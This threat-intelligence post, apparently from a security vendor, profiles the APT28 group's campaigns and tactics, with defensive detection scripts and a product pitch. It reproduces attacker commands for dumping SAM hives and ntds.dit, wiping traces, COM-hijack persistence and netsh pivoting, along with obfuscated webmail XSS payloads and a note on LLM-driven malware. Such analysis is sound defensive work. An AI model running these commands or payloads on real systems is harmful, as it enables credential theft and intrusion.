APT28 has established itself as one of the most persistent and adaptable threat groups active today, operating across political, military, and diplomatic landscapes for more than a decade. First observed in 2009, the group quickly moved from small-scale intrusions to high-impact operations. Its major events include compromises of government, NGO, and media organizations; the 2015 disruption of TV5Monde; the 2016 breaches of the DCCC (Democratic Congressional Campaign Committee) and DNC (Democratic National Committee); the targeting of WADA (World Anti-Doping Agency) and release of athlete data; activity linked to the Lausanne hotel intrusion affecting CCES (Canadian Centre for Ethics in Sport); the failed 2018 close-access attempt against the OPCW (Organisation for the Prohibition of Chemical Weapons); the introduction of the "Nearest Neighbor" Wi-Fi technique in 2022; large-scale website compromises across Ukrainian government entities in 2023; and the 2025 appearance of LAMEHUG malware, which is capable of generating commands from text descriptions.
Across these operations, APT28 consistently adapts its methods, blending proven tradecraft with new capabilities to match each target environment. The group’s TTPs span the full intrusion lifecycle, involving targeted reconnaissance of Wi-Fi networks, social engineering over secure messaging platforms, and predictive domain registration to build infrastructure in advance. Access vectors combine spearphishing documents, exploitation of webmail vulnerabilities, and proximity-based Wi-Fi attacks. Execution frequently relies on PowerShell, native Windows utilities, and malicious Office macros, while persistence is maintained through logon script manipulation and COM hijacking. Privilege escalation uses vulnerabilities such as CVE-2022-38028, and defense evasion techniques range from steganography and encryption to MOTW bypasses. The group collects data through keylogging, email harvesting, clipboard monitoring, and automated mailbox extraction, and communicates over HTTPS or cloud storage services before exfiltrating stolen information through encrypted uploads.
In this post, we will review APT28’s major historical operations, highlight its significant campaigns across political, governmental, and international organizations, and analyze its tactics, techniques, and procedures to understand how it conducts sustained and multifaceted cyber operations. In the end, we will show how Picus helps defend against this group.
2009 – Activity attributed to the group began, with targets including military and government entities, non-governmental organizations (NGOs), and journalists [1].
8 April 2015 – The broadcast network of French TV station TV5Monde was compromised and taken off air in a sabotage operation claimed by the "CyberCaliphate," which was assessed to be a false flag operation conducted by the group [1].
March 2016 – A spearphishing campaign was launched targeting personal email accounts of individuals associated with the Hillary Clinton presidential campaign, including the campaign chairman, using shortened links redirecting to spoofed Google login pages.
April 2016 – Networks belonging to the Democratic Congressional Campaign Committee (DCCC) and the Democratic National Committee (DNC) were breached, leading to the exfiltration of thousands of emails and documents [2].
15 June 2016 – The "Guccifer 2.0" online persona was created to claim responsibility for the DNC breach and disseminate stolen documents, falsely presenting the intrusion as the work of a lone hacktivist.
August 2016 – The World Anti-Doping Agency (WADA) was targeted; stolen medical records of athletes were subsequently leaked under the guise of the "Fancy Bears' Hack Team" [1].
September 2016 – An on-site compromise of a Wi-Fi network at a hotel in Lausanne, Switzerland, was used to target a senior official from the Canadian Centre for Ethics in Sport (CCES) and subsequently compromise the CCES network [3].
February 2018 – Ministries of Foreign Affairs in Europe and North America were targeted using a "Jane's 360" defense event lure to deliver the SofacyCarberp payload via malicious Excel macros [4].
April 2018 – An attempted close-access hacking operation targeting the Organisation for the Prohibition of Chemical Weapons (OPCW) in The Hague was disrupted, leading to the seizure of equipment used to compromise Wi-Fi networks [3].
September 2019 – A broad credential harvesting campaign was initiated against more than 200 organizations, including political campaigns and policy organizations, utilizing brute force and password spray tactics routed through the Tor network [5].
February 2022 – A "Nearest Neighbor" attack vector was employed, where compromised Wi-Fi networks at adjacent organizations were used to gain proximity access to a target’s corporate Wi-Fi network, facilitated by a zero-day privilege escalation vulnerability (CVE-2022-38028) in the Windows Print Spooler service [6].
February 2023 – Reflected cross-site scripting (XSS) vulnerabilities on Ukrainian government websites were exploited to redirect users to phishing pages designed to steal webmail credentials [7].
10 July 2025 – The LAMEHUG malware, which integrates Large Language Model (LLM) capabilities to generate commands based on text descriptions, was deployed against Ukrainian government officials [8].
The following is a comprehensive analysis of the Tactics, Techniques, and Procedures (TTPs) attributed to APT28. This analysis aggregates intelligence observed across multiple campaigns, including the "Nearest Neighbor" attack, campaigns targeting Ukrainian military personnel via Signal, and Operation RoundPress [4][6][9][10].
To discover potential entry vectors into a target network, the adversary deployed a custom PowerShell script on compromised systems belonging to neighboring organizations. This script was utilized to enumerate and examine wireless networks within the range of a dual-homed system's wireless adapter. Through this activity, the Service Set Identifier (SSID) of the intended target's enterprise Wi-Fi network was identified.
In specific campaigns, Ukrainian military administration and command personnel were targeted to identify wounded personnel, associated chains of command, units, and equipment provisioning trails. To facilitate this, the threat actor engaged targets via private chats on the Signal messaging application. By posing as a superior or colleague, the adversary created a false sense of urgency, invoking legal threats or compensation decisions, to pressure victims into performing actions or providing sensitive information.
The adversary registered new domains and populated them with default landing pages, which were reused over the course of a year. These pages contained specific strings, such as "866-593-54352", "522 Clematis. Suite 3000", and "403-965-2341", which allowed for the prediction of C2 domains like cdnverify[.]net prior to their active use. Additionally, specific domains were acquired to support "Operation RoundPress," including hijx[.]xyz.
Virtual Private Servers (VPS) were utilized to host command and control infrastructure. These servers were hosted by various providers, including GLOBALAXS NOC PARIS, 23VNet Kft, Administrat, Belcloud, M247 Europe SRL, and HOSTGNON LTD.
Legitimate cloud storage services were leveraged to facilitate command and control (C2) operations. Accounts were registered on platforms such as Icedrive and Koofr, including specific accounts like Alan_Smith2304@outlook[.]com and jakub2233@tutamail[.]com. These accounts hosted distinct storage containers for storing malware payloads and depositing exfiltrated data.
Open-source frameworks were modified to suit operational requirements. The Covenant framework, specifically the GruntHTTPStager, was utilized with a custom C2Bridge to allow interaction with the Koofr API.
Additionally, a custom C++ malware named BeardShell was developed to execute PowerShell commands and interact with Icedrive.
For webmail operations, a specialized JavaScript framework named "SpyPress" was created with four variants: SpyPress.HORDE, SpyPress.MDAEMON, SpyPress.ROUNDCUBE, and SpyPress.ZIMBRA.
The open-source tool Luckystrike was assessed to have been used for generating malicious delivery documents. Macros found in delivery documents bore a close resemblance to those generated by Luckystrike.
Access to victim environments was obtained via spearphishing emails that exploited Cross-Site Scripting (XSS) vulnerabilities in public-facing webmail servers. Malicious code was embedded in email headers or directly in the HTML body, triggering execution when the message was viewed.
Phishing emails were sent with subject lines such as "Upcoming Defense events February 2018". The sender address was spoofed to resemble events@ihsmarkit.com, and the email contained a malicious Excel XLS attachment named "Upcoming Events February 2018.xls".
Weaponized Office documents were delivered directly via private Signal chats on the desktop version of the application. These documents mimicked official Ukrainian military forms, such as medical compensation requests, and personnel reports. This method was strategic because Signal Desktop does not implement Mark-of-the-Web (MOTW), preventing the documents from triggering standard Microsoft Office security flags.
The proximity of neighboring organizations was leveraged to connect to a target's corporate Wi-Fi network. By compromising a dual-homed system (connected via both Wi-Fi and wired Ethernet) at a nearby location, the adversary bridged the physical gap and established a connection to the target's wireless network without being on-site. This "Nearest Neighbor" attack later involved re-establishing access via the target's Guest Wi-Fi, which was not fully isolated from the wired corporate network.
PowerShell was used extensively to facilitate the "Nearest Neighbor" attack, compress files, and execute commands.
Powershell -c "Get-ChildItem C:\ProgramData\sam.save, C:\ProgramData\security.save, C:\ProgramData\system.save | Compress-Archive -DestinationPath C:\ProgramData\out.zip"

Powershell -c: starts a new PowerShell process and runs the quoted command, which gathers the previously staged SAM, SECURITY and SYSTEM hive copies and compresses them into a single archive.
The Windows Command Shell was employed to run native utilities (reg.exe, netsh.exe, cipher.exe) and batch scripts.
reg save hklm\sam C:\ProgramData\sam.save

start rundll32.exe "C:\Users\user\AppData\Local\cdnver.dll",#1
Weaponized Excel and Word documents contained malicious VBA macros responsible for dropping payloads, establishing persistence, and revealing hidden content.
'VBA6

' Turns the white-on-white lure text black once macros are enabled, "revealing" the content
ActiveSheet.Range("a1:c54").Font.Color = vbBlack
Malware extensively utilized Windows API functions. VBA macros used CreateProcessW for execution and GetFileAttributesW (aliased as GetImageResolution) to check for file existence.
The BeardShell backdoor leveraged LoadLibrary, GetProcAddress, and GetModuleFileNameW to facilitate execution and DLL proxying.
In the "Operation RoundPress" campaign, injected JavaScript executed within the victim's browser session upon rendering the malicious email.
<img src=x onerror=window.parent.eval(atob(...))>

<p title="</noembed><img src=x onerror=...>">

<a href="..."><script>...</script></a>

Zimbra-Calendar<img/alt="/src='Zimbra-Calendar/onerror=\"window[(function(tmz){ghwa='cxe'; return '\\x65'+decodeURI('%76')+'\\x61\\x6c'})()](window[(function(jvqka){const kqd=decodeURI('%61')+'\t'+decodeURI('%6F')+'\\x62'; oykbg='doix'; return kqd})()](frames[0].document.getElementById('a-cashed-skinLayout2')['\inn\e\r\T\e\xt']))\">
Infection relied on victims opening weaponized documents received via Signal or phishing emails. The lack of MOTW on Signal files permitted macros to run without standard security blocks, while Excel documents used white-on-white text to trick users into enabling macros to view content.
Persistence was established by writing the path of a malicious batch file to the HKCU\Environment\UserInitMprLogonScript registry key, ensuring the payload executed upon user login.
A malicious macro registered a new COM server to establish persistence. Using reg.exe, a registry key was added to point to a malicious DLL, ensuring it loaded with explorer.exe at login.
reg.exe add HKCU\Software\classes\CLSID\{2227A280-3AEA-1069-A2DE-08002B30309D}\InProcServer32 /d "C:\ProgramData\prnfldr.dll" /f
The post-compromise tool GooseEgg was utilized to exploit CVE-2022-38028, a vulnerability in the Microsoft Windows Print Spooler service. This activity facilitated privilege escalation on the compromised system.
Multiple obfuscation techniques were employed to conceal operations:
The malicious DLL prnfldr.dll was placed in C:\ProgramData\, mimicking a legitimate library associated with printer folders. The malware proxied exports of the legitimate DLL to maintain standard printing operations and avoid suspicion.
Additionally, archive files created for exfiltration were renamed with innocuous extensions such as .mp4 and .wav to resemble benign media files.
Malware attempted to inject code into running browser processes to handle C2 communications. It searched for processes like firefox.exe, chrome.exe, and iexplore.exe by comparing hashed process names against hardcoded values.
Files and folders created during operations were removed to conceal traces of the intrusion. The native Windows utility Cipher.exe was used to securely overwrite the deleted data, hindering forensic recovery.
cmd.exe /c cipher /W:C
VBA macros included routines to deobfuscate data at runtime by replacing character pairs to reconstruct valid commands.
With ActiveDocument.Content.Find
Additionally, the certutil -decode command was used to transform Base64 encoded text files into executables.
BeardShell performed anti-analysis checks immediately upon thread creation, terminating execution if the host had less than 2 GB of RAM or only one processor.
By delivering malicious documents via Signal Desktop, the Mark-of-the-Web (MOTW) protection was bypassed. Signal does not apply the MOTW identifier to saved files, preventing Microsoft Office from triggering "Protected View" and allowing macros to run.
Malicious macros utilized the GetFileAttributesW function to set file attributes for dropped payloads (e.g., windows.png, prnfldr.dll) to hidden, reducing their visual footprint.
DLL proxying was utilized by the malicious prnfldr.dll, which acted as a proxy for the legitimate DLL. Upon loading, it retrieved addresses of genuine functions from the real library and forwarded calls to them.
A similar technique was observed with the SlimAgent tool proxying eapphost.dll.
The rundll32.exe utility was used to execute the MiniDump function exported by comsvcs.dll to dump the memory of the LSASS process.
Credentials were harvested by exporting sensitive registry hives. The reg.exe utility was used to save the System, Security, and SAM hives to C:\ProgramData for exfiltration.
The Active Directory database (ntds.dit) was targeted for credential access.
vssadmin create shadow /for=C: /quiet
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM [dest]
SpyPress variants injected hidden HTML input fields into webmail pages to capture password manager autofills or user keystrokes.
Password-spray attacks were conducted against Internet-facing web services to identify valid accounts prior to breaching the network.
Additionally, a Kubernetes cluster was operated to conduct distributed, large-scale password spraying and guessing, often routed through commercial VPN services and Tor.
To facilitate credential harvesting, SpyPress.ROUNDCUBE forced victims to log out by creating an iframe that triggered a logout task. This compelled users to re-enter credentials into the compromised login flow.
let frame = get_window_parent_parent().document.createElement("iframe");
Malicious macros verified the installation of specific .NET Framework versions by checking for the existence of the directory C:\Windows\Microsoft.NET\Framework\v4.0.30319 to ensure support for subsequent payloads.
Reconnaissance tasks were executed on infected hosts through the Covenant framework. These tasks included using tracert to map network routes, performing ARP scans, and issuing GetNetworkInfo requests.
BeardShell retrieved the current username and workstation name using the Windows API NetWkstaUserGetInfo with parameter 1. This data was used to generate a unique identifier for the infected host.
The Covenant implant enumerated running processes to identify targets of interest or security software.
Additionally, malware hashed process names derived from SystemProcessInformation to identify web browsers for injection.
BeardShell executed the SystemInfo command as its first action. It also combined the local computer name, domain name, username, workstation name, and a hardware profile GUID (via GetCurrentHwProfileW) to create a unique fingerprint hash using the FNV4 algorithm.
Other campaigns collected unique identifiers based on storage volume serial numbers.
To avoid re-infection or detection, VBA macros queried for the existence of specific files, such as %localappdata%/windows.png and %allusersprofile%/prnfldr.dll, terminating if they were found.
SpyPress malware enumerated details about compromised email accounts.
The SlimAgent tool acted as a keylogger, recording keystrokes and encoding special keys in unicode (e.g., [BKSP]). It specifically monitored for potential passwords by triggering screenshots when a buffer of more than 4 characters was followed by an "Enter" press.
Archives of collected data were staged on the target's Outlook Web Access (OWA) server.
Screen capture functionality was implemented by simulating the VK_SCREENSHOT key press, saving the screenshot to the clipboard.
Covenant uploaded PNG screenshots of the desktop, while SlimAgent captured JPEG screenshots every 5 seconds.
SpyPress malware systematically iterated through victim mailboxes to collect messages.
To maintain access to information, SpyPress.ROUNDCUBE created a malicious server-side Sieve rule. This rule forwarded a copy of every incoming email to an attacker-controlled address (e.g., srezoska@skiff[.]com), ensuring collection persisted even if the malicious script stopped running.
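A server-side Sieve rule survives removal of the injected script, so the mailbox filter store is worth auditing directly rather than only the webmail session. The following Python check is an added example, not code from the original post or from the ESET analysis it cites: it scans Sieve scripts for redirect actions to addresses outside a set of organisation domains. The organisation domain, the benign helpdesk rule and the per-user script mapping are assumptions; the external address is the one quoted above.

```python
import re

# Matches `redirect "addr";` and `redirect :copy "addr";` (the :copy tag keeps the
# original message in the mailbox, so the victim never notices anything missing).
REDIRECT = re.compile(r'\bredirect\b((?:\s+:\w+)*)\s+"([^"]+)"\s*;', re.I)


def find_external_redirects(sieve_text, org_domains):
    """Return (address, silent_copy) for every redirect to a non-organisation domain."""
    org = {d.lower() for d in org_domains}
    hits = []
    for tags, addr in REDIRECT.findall(sieve_text):
        domain = addr.rsplit("@", 1)[-1].lower()
        if domain not in org:
            hits.append((addr, ":copy" in tags.lower()))
    return hits


def audit(scripts, org_domains):
    """scripts: {username: sieve_text}; returns {username: hits} for users with hits."""
    report = {}
    for user, text in scripts.items():
        hits = find_external_redirects(text, org_domains)
        if hits:
            report[user] = hits
    return report


# Constructed script: one assumed-benign internal forward plus a rule of the shape
# described above, pointing at the address quoted on this page.
SAMPLE_SIEVE = '''
require ["copy"];
if address :is "to" "helpdesk@example.gov" { redirect "queue@example.gov"; }
if true { redirect :copy "srezoska@skiff.com"; }
'''

if __name__ == "__main__":
    print(audit({"alice": SAMPLE_SIEVE, "bob": "keep;"}, ["example.gov"]))
```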
After triggering a screenshot key press, malware accessed the clipboard to retrieve the image data and convert it to JPG.
SlimAgent also monitored the clipboard, logging content between black-colored HTML tags to distinguish it from other data.
SpyPress payloads implemented automated data harvesting routines. SpyPress.ROUNDCUBE initiated email exfiltration every 7,200 seconds (2 hours), while SpyPress.ZIMBRA used setInterval to trigger every 14,400 seconds (4 hours).
Data collected from compromised systems, including ntds.dit and registry hives, was compressed into ZIP archives using PowerShell commands or the GUI version of WinRAR. WinRAR was also used to password-protect these archives.
Communication with C2 servers was conducted over HTTPS, with malware configured to ignore invalid security certificates using flags such as SECURITY_FLAG_IGNORE_CERT_DATE_INVALID and SECURITY_FLAG_IGNORE_UNKNOWN_CA.
To pivot from a Guest Wi-Fi network back into the corporate wired network, a series of port-forwards were established using netsh. This allowed access to segmented high-value systems.
cmd.exe /C netsh advfirewall firewall add rule name="Remote Event Log Management SMB" dir=in action=allow protocol=tcp localport=12345 > C:\Windows\Temp\MSI28122Ac.LOG 2>&1

cmd.exe /C netsh interface portproxy add v4tov4 listenaddress=172.33.xx.xx listenport=12345 connectaddress=172.20.xx.xx connectport=445 > C:\Windows\Temp\MSI2cBfA24.LOG 2>&1
Koofr and Icedrive were utilized as dead-drop resolvers.
SpyPress payloads encoded data sent to the C2 server in Base64. A specific string format was used for credentials, where px denoted password exfiltration.
Encoded: bWVAdmljdGltLm9yZyA6OiBweAoKbXl1c2VybmFtZSBteXBhc3N3b3Jk

Decoded: me@victim.org :: px, followed by a blank line and the captured "myusername mypassword"
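For an analyst who captures such a POST body, the record layout described above is enough to write a decoder. The following Python is an added example rather than code from the original post or from the ESET analysis: it decodes the '<account> :: <marker>' record (tolerating stripped padding and rejecting anything that does not follow the layout) and scans proxy-log lines for Base64 runs that decode to a password record. The log lines, their addresses and paths are constructed; the encoded sample is the one shown above.

```python
import base64
import binascii
import re

# Only the "px" marker is documented on this page; anything else is reported as unknown.
KNOWN_MARKERS = {"px": "password"}
B64_RUN = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")


def decode_spypress_record(b64_text):
    """Decode one record laid out as '<account> :: <marker>' + blank line + payload.

    Returns a dict with account, marker, kind and payload; raises ValueError for
    text that is not Base64 or does not follow that layout."""
    text = b64_text.strip()
    padded = text + "=" * (-len(text) % 4)      # tolerate stripped padding
    try:
        raw = base64.b64decode(padded, validate=True)
    except (binascii.Error, ValueError) as exc:
        raise ValueError(f"not valid Base64: {exc}") from None
    decoded = raw.decode("utf-8", errors="replace")
    header, sep, payload = decoded.partition("\n\n")
    if not sep or " :: " not in header:
        raise ValueError("no '<account> :: <marker>' header")
    account, _, marker = header.partition(" :: ")
    marker = marker.strip()
    return {"account": account.strip(), "marker": marker,
            "kind": KNOWN_MARKERS.get(marker, "unknown"), "payload": payload}


def find_credential_posts(log_lines):
    """Try every Base64-looking run in each line; report (line number, account)
    for the runs that decode to a password record."""
    hits = []
    for number, line in enumerate(log_lines, 1):
        for match in B64_RUN.finditer(line):
            try:
                record = decode_spypress_record(match.group(0))
            except ValueError:
                continue
            if record["kind"] == "password":
                hits.append((number, record["account"]))
    return hits


# Constructed proxy-log lines (addresses and paths are made up); the first body is
# the encoded sample quoted on this page, the second is an ordinary opaque token.
SAMPLE_LOG = [
    '10.0.0.5 - - [12/May/2025:09:14:02 +0000] "POST /upload HTTP/1.1" 200 '
    'body="bWVAdmljdGltLm9yZyA6OiBweAoKbXl1c2VybmFtZSBteXBhc3N3b3Jk"',
    '10.0.0.7 - - [12/May/2025:09:14:09 +0000] "GET /roundcube/?_task=mail HTTP/1.1" 200 '
    'sid="c3RhdGljLXNlc3Npb24tY29va2llLXZhbHVlLTAx"',
]

if __name__ == "__main__":
    print(decode_spypress_record("bWVAdmljdGltLm9yZyA6OiBweAoKbXl1c2VybmFtZSBteXBhc3N3b3Jk"))
    print(find_credential_posts(SAMPLE_LOG))
```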
Files transferred to and from C2 storage were encrypted. BeardShell utilized the ChaCha20-Poly1305 algorithm with a 32-byte key, producing a 16-byte authentication tag. Headers and footers were added to masquerade the encrypted data as valid image types (GIF, PNG, JPEG).
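Both the archives renamed to .mp4/.wav mentioned under defense evasion and the image-masked ChaCha20 blobs described here defeat extension-based checks but not structural ones. The following Python is an added example, not code from the original post or from the analysed malware: it flags files whose media extension sits on top of an archive signature, and files that carry a PNG signature but whose chunks do not parse (with weaker trailer checks for GIF and JPEG, which have no per-chunk CRC). All sample files, including the minimal valid PNG, are constructed inline.

```python
import struct
import zlib

# Signatures for the container and image formats named on this page.
ARCHIVE_MAGIC = {b"PK\x03\x04": "zip", b"Rar!\x1a\x07": "rar"}
MEDIA_EXTS = {".mp4", ".wav", ".gif", ".png", ".jpg", ".jpeg"}
PNG_SIG = b"\x89PNG\r\n\x1a\n"


def png_structure_ok(data):
    """True only if every PNG chunk carries a valid CRC, the first chunk is IHDR,
    the last is IEND and nothing trails it. A PNG signature glued onto an
    encrypted blob fails because the bytes after it do not parse as chunks."""
    if not data.startswith(PNG_SIG):
        return False
    pos, types = len(PNG_SIG), []
    while pos + 12 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        end = pos + 12 + length
        if end > len(data):
            return False
        body = data[pos + 8:pos + 8 + length]
        (crc,) = struct.unpack(">I", data[end - 4:end])
        if zlib.crc32(ctype + body) & 0xFFFFFFFF != crc:
            return False
        types.append(ctype)
        pos = end
        if ctype == b"IEND":
            break
    return bool(types) and types[0] == b"IHDR" and types[-1] == b"IEND" and pos == len(data)


def classify(name, data):
    """Return the findings for one file; an empty list means nothing suspicious."""
    findings = []
    ext = name[name.rfind("."):].lower() if "." in name else ""
    for magic, kind in ARCHIVE_MAGIC.items():
        if data.startswith(magic) and ext in MEDIA_EXTS:
            findings.append(f"{kind} archive renamed to {ext}")
    if data.startswith(PNG_SIG) and not png_structure_ok(data):
        findings.append("PNG signature but chunk structure does not parse")
    # GIF and JPEG have no per-chunk CRC, so only the trailer is checked here;
    # a blob given both a fake header and a fake footer needs a real decoder.
    if data[:6] in (b"GIF87a", b"GIF89a") and not data.endswith(b";"):
        findings.append("GIF header without 0x3B trailer")
    if data.startswith(b"\xff\xd8\xff") and not data.endswith(b"\xff\xd9"):
        findings.append("JPEG SOI marker without EOI marker")
    return findings


def scan(files):
    """files: {name: bytes}; returns only the entries that produced findings."""
    return {n: f for n, f in ((n, classify(n, d)) for n, d in files.items()) if f}


def _png_chunk(ctype, body):
    crc = zlib.crc32(ctype + body) & 0xFFFFFFFF
    return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", crc)


# Constructed samples: a genuine 1x1 RGB PNG, an ordinary WAV header, a ZIP
# archive renamed to .mp4, and PNG/GIF signatures pasted onto opaque bytes.
REAL_PNG = (PNG_SIG
            + _png_chunk(b"IHDR", struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0))
            + _png_chunk(b"IDAT", zlib.compress(b"\x00\x00\x00\x00"))
            + _png_chunk(b"IEND", b""))
SAMPLES = {
    "photo.png": REAL_PNG,
    "voice.wav": b"RIFF" + bytes(4) + b"WAVEfmt " + bytes(24),
    "holiday.mp4": b"PK\x03\x04" + bytes(40),
    "logo.png": PNG_SIG + bytes(range(48)),
    "cat.gif": b"GIF89a" + bytes(range(30)),
}

if __name__ == "__main__":
    for name, findings in scan(SAMPLES).items():
        print(name, "->", "; ".join(findings))
```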
Collected system information, screenshots, email bodies, contacts, and credentials were transmitted directly to the C2 server via established HTTPS channels or HTTP POST requests.
Collected data, including keylogs, screenshots, and command outputs, was exfiltrated by uploading files to designated containers on cloud storage services like Icedrive or Koofr. SlimAgent prepared encrypted logs in HTML format, named Desktop_<DD-MM-YYYY_HH-MM-SS>.svc, for this purpose.
We also strongly suggest simulating APT28 Attacks to test the effectiveness of your security controls against real-life cyber attacks using the Picus Security Validation Platform. You can also test your defenses against hundreds of other threat groups within minutes with a 14-day free trial of the Picus Platform.
Picus Threat Library includes the following threats for APT28:
Threat ID | Threat Name | Attack Module
43803 | Sofacy Threat Group Campaign Malware Download Threat | Network Infiltration
76649 | Russian Gru Threat Group Campaign | Windows Endpoint
52129 | APT28 Threat Group Campaign Malware Email Threat - 3 | E-mail Infiltration
26499 | APT28 Threat Group Campaign Malware Download Threat - 3 | Network Infiltration
32102 | APT28 Threat Group Campaign | Windows Endpoint
69336 | APT28 Threat Group Campaign Backdoor Malware Download Threat | Network Infiltration
40970 | APT28 Threat Group Campaign Backdoor Malware Email Threat | Network Infiltration
55136 | APT28 Threat Group Campaign RAT Download Threat | Network Infiltration
87655 | APT28 Threat Group Campaign RAT Email Threat | Network Infiltration
96442 | APT28 Threat Group Campaign Malware Download Threat - 2 | Network Infiltration
51063 | APT28 Threat Group Campaign Malware Email Threat - 2 | Network Infiltration
20220 | APT28 Threat Group Campaign Malware Downloader Email Threat | Network Infiltration
43231 | APT28 Threat Group Campaign Malware Downloader Download Threat | Network Infiltration
59102 | APT28 Threat Group Campaign Malware Email Threat - 1 | Network Infiltration
86199 | APT28 Threat Group Campaign Malware Download Threat - 1 | Network Infiltration
Start simulating emerging threats today and get actionable mitigation insights with a 14-day free trial of the Picus Security Validation Platform.
APT28 is also known as: APT 28, APT-C-20, ATK5, Blue Athena, BlueDelta, FANCY BEAR, FROZENLAKE, Fancy Bear, Fighting Ursa, Forest Blizzard, G0007, Grey-Cloud, Grizzly Steppe, Group 74, Group-4127, GruesomeLarch, IRON TWILIGHT, ITG05, Pawn Storm, SIG40, SNAKEMACKEREL, STRONTIUM, Sednit, Sofacy, Swallowtail, T-APT-12, TA422, TG-4127, Tsar Team, TsarTeam, UAC-0028, Threat Group-4127, ATK 5, TAG-0700, UAC-0063, TAG-110.
[1] “IRON TWILIGHT Supports Active Measures,” Secureworks. Accessed: Dec. 05, 2025. [Online]. Available: https://www.secureworks.com/research/iron-twilight-supports-active-measures
[2] “CrowdStrike’s work with the Democratic National Committee: Setting the record straight,” CrowdStrike.com. Accessed: Dec. 05, 2025. [Online]. Available: https://www.crowdstrike.com/en-us/blog/bears-midst-intrusion-democratic-national-committee/
[3] “U.S. Charges Russian GRU Officers with International Hacking and Related Influence and Disinformation Operations.” Accessed: Dec. 05, 2025. [Online]. Available: https://www.justice.gov/archives/opa/pr/us-charges-russian-gru-officers-international-hacking-and-related-influence-and
[4] B. Lee, M. Harbison, and R. Falcone, “Sofacy Attacks Multiple Government Entities,” Unit 42. Accessed: Dec. 04, 2025. [Online]. Available: https://unit42.paloaltonetworks.com/unit42-sofacy-attacks-multiple-government-entities/
[5] T. Burt, “New cyberattacks targeting U.S. elections,” Microsoft On the Issues. Accessed: Dec. 05, 2025. [Online]. Available: https://blogs.microsoft.com/on-the-issues/2020/09/10/cyberattacks-us-elections-trump-biden/
[6] “The Nearest Neighbor Attack: How A Russian APT Weaponized Nearby Wi-Fi Networks for Covert Access,” Volexity. Accessed: Dec. 04, 2025. [Online]. Available: https://www.volexity.com/blog/2024/11/22/the-nearest-neighbor-attack-how-a-russian-apt-weaponized-nearby-wi-fi-networks-for-covert-access/
[7] B. Leonard, “Ukraine remains Russia’s biggest cyber focus in 2023,” Google. Accessed: Dec. 05, 2025. [Online]. Available: https://blog.google/threat-analysis-group/ukraine-remains-russias-biggest-cyber-focus-in-2023/
[8] V. Simonovich, “Cato CTRL Threat Research: Analyzing LAMEHUG – First Known LLM-Powered Malware with Links to APT28 (Fancy Bear),” Cato Networks. Accessed: Dec. 05, 2025. [Online]. Available: https://www.catonetworks.com/blog/cato-ctrl-threat-research-analyzing-lamehug/
[9] Sekoia TDR, “APT28 Operation Phantom Net Voxel,” Sekoia.io Blog. Accessed: Dec. 04, 2025. [Online]. Available: https://blog.sekoia.io/apt28-operation-phantom-net-voxel
[10] M. Faou, “Operation RoundPress.” Accessed: Dec. 05, 2025. [Online]. Available: https://www.welivesecurity.com/en/eset-research/operation-roundpress/